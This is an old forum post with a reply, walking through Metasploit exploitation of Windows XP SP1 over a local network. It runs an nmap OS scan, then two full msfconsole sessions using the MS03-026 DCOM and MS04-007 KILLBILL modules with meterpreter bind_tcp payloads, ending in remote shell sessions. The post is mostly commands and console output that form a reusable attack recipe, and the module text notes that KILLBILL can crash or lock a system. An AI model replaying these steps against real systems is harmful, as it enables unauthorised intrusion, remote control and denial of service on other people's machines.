Metasploit Proof of Concept [ Linux ]

Nytro · August 9, 2009

this is an old exploit but still works

i have test it on Local Area Network here

this exploit tested on Windows XP Service Pack 1

[o] DCOM RPC Exploit (ms03_026_dcom)

# Description

This module exploits a stack overflow in the RPCSS service, this

vulnerability was originally found by the Last Stage of Delirium

research group and has bee widely exploited ever since. This module

can exploit the English versions of Windows NT 4.0 SP3-6a, Windows

2000, Windows XP, and Windows 2003 all in one request

root@ubuntu:~# ping 172.16.1.31

PING 172.16.1.31 (172.16.1.31) 56(84) bytes of data.

64 bytes from 172.16.1.31: icmp_seq=1 ttl=128 time=2.09 ms

64 bytes from 172.16.1.31: icmp_seq=2 ttl=128 time=0.335 ms

64 bytes from 172.16.1.31: icmp_seq=3 ttl=128 time=0.342 ms

^C

--- 172.16.1.31 ping statistics ---

3 packets transmitted, 3 received, 0% packet loss, time 2005ms

rtt min/avg/max/mdev = 0.335/0.922/2.091/0.826 ms

root@ubuntu:~# nmap -O -PN 172.16.1.31

Starting Nmap 4.62 ( http://nmap.org ) at 2009-06-21 09:56 WIT

Interesting ports on ******-******.kapukvalley.net (172.16.1.31):

Not shown: 1710 closed ports

PORT STATE SERVICE

135/tcp open msrpc

139/tcp open netbios-ssn

445/tcp open microsoft-ds

1025/tcp open NFS-or-IIS

5000/tcp open upnp

MAC Address: 00:1C:F0:5A:98:AF (D-Link)

Device type: general purpose

Running: Microsoft Windows 2000

OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1

Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 1.860 seconds

root@ubuntu:~# cd /home/noge/pentest/metasploit/

root@ubuntu:/home/noge/pentest/metasploit# ./msfconsole

| | _) |

__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|

| | | __/ | ( |\__ \ | | | ( | | |

_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|

_|

=[ msf v3.3-dev

+ -- --=[ 378 exploits - 234 payloads

+ -- --=[ 20 encoders - 7 nops

=[ 154 aux

msf > use windows/dcerpc/ms03_026_dcom

msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp

PAYLOAD => windows/meterpreter/bind_tcp

msf exploit(ms03_026_dcom) > show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST yes The target address

RPORT 135 yes The target port

Payload options (windows/meterpreter/bind_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC thread yes Exit technique: seh, thread, process

LPORT 4444 yes The local port

RHOST no The target address

Exploit target:

Id Name

-- ----

0 Windows NT SP3-6a/2000/XP/2003 Universal

msf exploit(ms03_026_dcom) > set RHOST 172.16.1.31

RHOST => 172.16.1.31

msf exploit(ms03_026_dcom) > set TARGET 0

TARGET => 0

msf exploit(ms03_026_dcom) > show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST 172.16.1.31 yes The target address

RPORT 135 yes The target port

Payload options (windows/meterpreter/bind_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC thread yes Exit technique: seh, thread, process

LPORT 4444 yes The local port

RHOST 172.16.1.31 no The target address

Exploit target:

Id Name

-- ----

0 Windows NT SP3-6a/2000/XP/2003 Universal

msf exploit(ms03_026_dcom) > exploit

[*] Started bind handler

[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...

[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...

[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...

[*] Sending exploit ...

[*] Transmitting intermediate stager for over-sized stage...(191 bytes)

[*] The DCERPC service did not reply to our request

[*] Sending stage (2650 bytes)

[*] Sleeping before handling stage...

[*] Uploading DLL (75787 bytes)...

[*] Upload completed.

[*] Meterpreter session 1 opened (172.16.1.12:38423 -> 172.16.1.31:4444)

meterpreter > pwd

C:\WINDOWS\system32

meterpreter > sysinfo

Computer: ******-******

OS : Windows XP (Build 2600, Service Pack 1).

meterpreter >

=============================================================================================

[o] KILLBILL SMB Exploit (ms04_007_killbill)

# Description

This is an exploit for a previously undisclosed vulnerability in the

bit string decoding code in the Microsoft ASN.1 library. This

vulnerability is not related to the bit string vulnerability

described in eEye advisory AD20040210-2. Both vulnerabilities were

fixed in the MS04-007 patch. You are only allowed one attempt with

this vulnerability. If the payload fails to execute, the LSASS

system service will crash and the target system will automatically

reboot itself in 60 seconds. If the payload succeeeds, the system

will no longer be able to process authentication requests, denying

all attempts to login through SMB or at the console. A reboot is

required to restore proper functioning of an exploited system. This

exploit has been successfully tested with the win32/*/reverse_tcp

payloads, however a few problems were encounted when using the

equivalent bind payloads. Your mileage may vary.

msf > use windows/smb/ms04_007_killbill

msf exploit(ms04_007_killbill) > set PAYLOAD windows/meterpreter/bind_tcp

PAYLOAD => windows/meterpreter/bind_tcp

msf exploit(ms04_007_killbill) > show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

PROTO smb yes Which protocol to use: http or smb

RHOST yes The target address

RPORT 445 yes Set the SMB service port

Payload options (windows/meterpreter/bind_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC thread yes Exit technique: seh, thread, process

LPORT 4444 yes The local port

RHOST no The target address

Exploit target:

Id Name

-- ----

0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1

msf exploit(ms04_007_killbill) > set RHOST 172.16.1.31

RHOST => 172.16.1.31

msf exploit(ms04_007_killbill) > show targets

Exploit targets:

Id Name

-- ----

0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1

msf exploit(ms04_007_killbill) > set TARGET 0

TARGET => 0

msf exploit(ms04_007_killbill) > show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

PROTO smb yes Which protocol to use: http or smb

RHOST 172.16.1.31 yes The target address

RPORT 445 yes Set the SMB service port

Payload options (windows/meterpreter/bind_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC thread yes Exit technique: seh, thread, process

LPORT 4444 yes The local port

RHOST 172.16.1.31 no The target address

Exploit target:

Id Name

-- ----

0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1

msf exploit(ms04_007_killbill) > exploit

[*] Started bind handler

[*] Error: The server responded with error: STATUS_ACCESS_VIOLATION (Command=115 WordCount=0)

[*] Transmitting intermediate stager for over-sized stage...(191 bytes)

[*] Sending stage (2650 bytes)

[*] Sleeping before handling stage...

[*] Uploading DLL (75787 bytes)...

[*] Upload completed.

[*] Meterpreter session 3 opened (172.16.1.12:33484 -> 172.16.1.31:4444)

meterpreter > sysinfo

Computer: ******-******

OS : Windows XP (Build 2600, Service Pack 1).

meterpreter >

by matthews

adonisslanic · September 11, 2009

Buna treaba Nytro... Eu sunt in ubuntu 9.04 Jaunty... si chiar sunt multumit de Metasploit si il folosesc in "echipa" cu Nessus si Nmap si totul merge ca uns... Este un mic cam veche faza care ai pus-o aici dar este foarte educativa pentru cei care vor sa exploreze tainele calculatoarelor

Sign In

Metasploit Proof of Concept [ Linux ]

Recommended Posts

Nytro

adonisslanic

Join the conversation

Browse

Activity

Pages